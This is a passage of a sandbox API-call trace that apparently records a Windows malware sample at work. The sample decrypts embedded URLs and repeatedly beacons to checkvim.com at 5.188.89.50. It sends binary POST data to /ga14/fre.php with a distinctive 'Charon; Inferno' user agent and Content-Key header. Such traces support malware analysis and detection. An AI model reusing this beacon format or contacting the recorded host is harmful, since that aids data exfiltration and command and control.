dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x640) returned 0x420 [0276.187] Sleep (dwMilliseconds=0xea60) [0276.189] GetProcessHeap () returned 0x840000 [0276.189] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0276.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.190] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0276.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.196] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0276.203] GetProcessHeap () returned 0x840000 [0276.203] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0276.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.204] CryptImportKey (in: hProv=0x870128, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7f0) returned 1 [0276.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.205] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0276.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.207] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0276.207] GetProcessHeap () returned 0x840000 [0276.207] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0276.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.208] CryptDecrypt (in: hKey=0x87e7f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0276.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.209] CryptDestroyKey (hKey=0x87e7f0) returned 1 [0276.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.210] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0276.210] GetProcessHeap () returned 0x840000 [0276.210] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0276.211] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0276.211] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0276.212] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0276.212] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0276.213] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0276.213] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0276.217] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0276.217] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0276.217] GetProcessHeap () returned 0x840000 [0276.217] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0276.217] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0276.217] GetProcessHeap () returned 0x840000 [0276.217] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0276.217] GetProcessHeap () returned 0x840000 [0276.218] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0276.218] GetProcessHeap () returned 0x840000 [0276.218] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0276.218] GetProcessHeap () returned 0x840000 [0276.218] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fe18 [0276.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.223] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0276.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.230] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0276.237] GetProcessHeap () returned 0x840000 [0276.237] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0276.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.238] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e530) returned 1 [0276.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.240] CryptSetKeyParam (hKey=0x87e530, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0276.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.241] CryptSetKeyParam (hKey=0x87e530, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0276.241] GetProcessHeap () returned 0x840000 [0276.241] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0276.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.242] CryptDecrypt (in: hKey=0x87e530, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fe18, pdwDataLen=0x19f9a4 | out: pbData=0x87fe18, pdwDataLen=0x19f9a4) returned 1 [0276.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.243] CryptDestroyKey (hKey=0x87e530) returned 1 [0276.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.244] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0276.244] GetProcessHeap () returned 0x840000 [0276.244] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0276.244] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0276.245] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0276.245] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0276.246] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0276.246] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0276.247] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0276.247] GetProcessHeap () returned 0x840000 [0276.247] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8711a0 [0276.247] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0276.248] GetProcessHeap () returned 0x840000 [0276.248] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871ca8 [0276.248] socket (af=2, type=1, protocol=6) returned 0x424 [0276.248] connect (s=0x424, name=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0276.323] FreeAddrInfoW (pAddrInfo=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0276.328] GetProcessHeap () returned 0x840000 [0276.328] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f2d0 [0276.328] GetProcessHeap () returned 0x840000 [0276.328] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0276.329] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0276.330] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0276.330] GetProcessHeap () returned 0x840000 [0276.330] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0276.330] GetProcessHeap () returned 0x840000 [0276.330] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0276.330] GetProcessHeap () returned 0x840000 [0276.330] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb48 [0276.330] GetProcessHeap () returned 0x840000 [0276.330] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0276.331] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0276.332] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0276.332] GetProcessHeap () returned 0x840000 [0276.332] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0276.332] GetProcessHeap () returned 0x840000 [0276.332] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0276.332] send (s=0x424, buf=0x873a58*, len=237, flags=0) returned 237 [0276.332] send (s=0x424, buf=0x87eb58*, len=159, flags=0) returned 159 [0276.332] GetProcessHeap () returned 0x840000 [0276.333] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0276.333] recv (in: s=0x424, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0276.692] GetProcessHeap () returned 0x840000 [0276.693] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0276.693] GetProcessHeap () returned 0x840000 [0276.693] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0276.693] GetProcessHeap () returned 0x840000 [0276.693] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0276.693] GetProcessHeap () returned 0x840000 [0276.693] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f2d0 | out: hHeap=0x840000) returned 1 [0276.693] closesocket (s=0x424) returned 0 [0276.694] GetProcessHeap () returned 0x840000 [0276.694] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871ca8 | out: hHeap=0x840000) returned 1 [0276.695] GetProcessHeap () returned 0x840000 [0276.695] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0276.695] GetProcessHeap () returned 0x840000 [0276.695] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fe18 | out: hHeap=0x840000) returned 1 [0276.695] GetProcessHeap () returned 0x840000 [0276.695] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8711a0 | out: hHeap=0x840000) returned 1 [0276.695] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xda4) returned 0x424 [0276.697] Sleep (dwMilliseconds=0xea60) [0276.699] GetProcessHeap () returned 0x840000 [0276.699] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa28 [0276.700] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.700] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0276.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.733] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0276.747] GetProcessHeap () returned 0x840000 [0276.747] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0276.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.748] CryptImportKey (in: hProv=0x86f688, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6f0) returned 1 [0276.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.750] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0276.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.751] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0276.751] GetProcessHeap () returned 0x840000 [0276.751] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0276.752] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.752] CryptDecrypt (in: hKey=0x87e6f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa28, pdwDataLen=0x19f9a4 | out: pbData=0x87fa28, pdwDataLen=0x19f9a4) returned 1 [0276.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.753] CryptDestroyKey (hKey=0x87e6f0) returned 1 [0276.754] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.754] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0276.754] GetProcessHeap () returned 0x840000 [0276.754] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0276.755] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0276.755] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0276.756] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0276.756] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0276.757] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0276.758] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0276.758] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0276.759] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0276.759] GetProcessHeap () returned 0x840000 [0276.759] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0276.759] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0276.759] GetProcessHeap () returned 0x840000 [0276.760] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0276.760] GetProcessHeap () returned 0x840000 [0276.760] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0276.760] GetProcessHeap () returned 0x840000 [0276.760] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa28 | out: hHeap=0x840000) returned 1 [0276.760] GetProcessHeap () returned 0x840000 [0276.760] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa70 [0276.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.761] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0276.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.770] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0276.777] GetProcessHeap () returned 0x840000 [0276.778] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0276.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.779] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e4f0) returned 1 [0276.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.780] CryptSetKeyParam (hKey=0x87e4f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0276.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.781] CryptSetKeyParam (hKey=0x87e4f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0276.782] GetProcessHeap () returned 0x840000 [0276.782] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0276.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.783] CryptDecrypt (in: hKey=0x87e4f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa70, pdwDataLen=0x19f9a4 | out: pbData=0x87fa70, pdwDataLen=0x19f9a4) returned 1 [0276.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.784] CryptDestroyKey (hKey=0x87e4f0) returned 1 [0276.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0276.785] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0276.785] GetProcessHeap () returned 0x840000 [0276.785] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0276.786] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0276.787] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0276.787] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0276.788] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0276.789] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0276.792] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0276.792] GetProcessHeap () returned 0x840000 [0276.792] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0276.792] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871290*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0276.795] GetProcessHeap () returned 0x840000 [0276.795] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c08 [0276.795] socket (af=2, type=1, protocol=6) returned 0x428 [0276.795] connect (s=0x428, name=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0276.864] FreeAddrInfoW (pAddrInfo=0x871290*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0276.864] GetProcessHeap () returned 0x840000 [0276.864] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fce8 [0276.864] GetProcessHeap () returned 0x840000 [0276.864] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0276.865] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0276.866] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0276.866] GetProcessHeap () returned 0x840000 [0276.866] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0276.866] GetProcessHeap () returned 0x840000 [0276.866] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0276.866] GetProcessHeap () returned 0x840000 [0276.866] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f8c0 [0276.866] GetProcessHeap () returned 0x840000 [0276.866] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0276.867] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0276.868] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0276.868] GetProcessHeap () returned 0x840000 [0276.868] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0276.868] GetProcessHeap () returned 0x840000 [0276.868] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0276.868] send (s=0x428, buf=0x873a58*, len=237, flags=0) returned 237 [0276.868] send (s=0x428, buf=0x87eb58*, len=159, flags=0) returned 159 [0276.868] GetProcessHeap () returned 0x840000 [0276.868] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0276.868] recv (in: s=0x428, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0277.216] GetProcessHeap () returned 0x840000 [0277.216] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0277.216] GetProcessHeap () returned 0x840000 [0277.216] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f8c0 | out: hHeap=0x840000) returned 1 [0277.216] GetProcessHeap () returned 0x840000 [0277.216] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0277.216] GetProcessHeap () returned 0x840000 [0277.216] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fce8 | out: hHeap=0x840000) returned 1 [0277.216] closesocket (s=0x428) returned 0 [0277.217] GetProcessHeap () returned 0x840000 [0277.217] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c08 | out: hHeap=0x840000) returned 1 [0277.217] GetProcessHeap () returned 0x840000 [0277.217] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0277.217] GetProcessHeap () returned 0x840000 [0277.217] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa70 | out: hHeap=0x840000) returned 1 [0277.217] GetProcessHeap () returned 0x840000 [0277.217] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0277.218] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x68c) returned 0x428 [0277.221] Sleep (dwMilliseconds=0xea60) [0277.223] GetProcessHeap () returned 0x840000 [0277.223] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc20 [0277.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.225] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0277.235] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.236] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fa40) returned 1 [0277.245] GetProcessHeap () returned 0x840000 [0277.245] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0277.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.246] CryptImportKey (in: hProv=0x86fa40, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e430) returned 1 [0277.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.248] CryptSetKeyParam (hKey=0x87e430, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0277.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.249] CryptSetKeyParam (hKey=0x87e430, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0277.249] GetProcessHeap () returned 0x840000 [0277.249] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0277.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.261] CryptDecrypt (in: 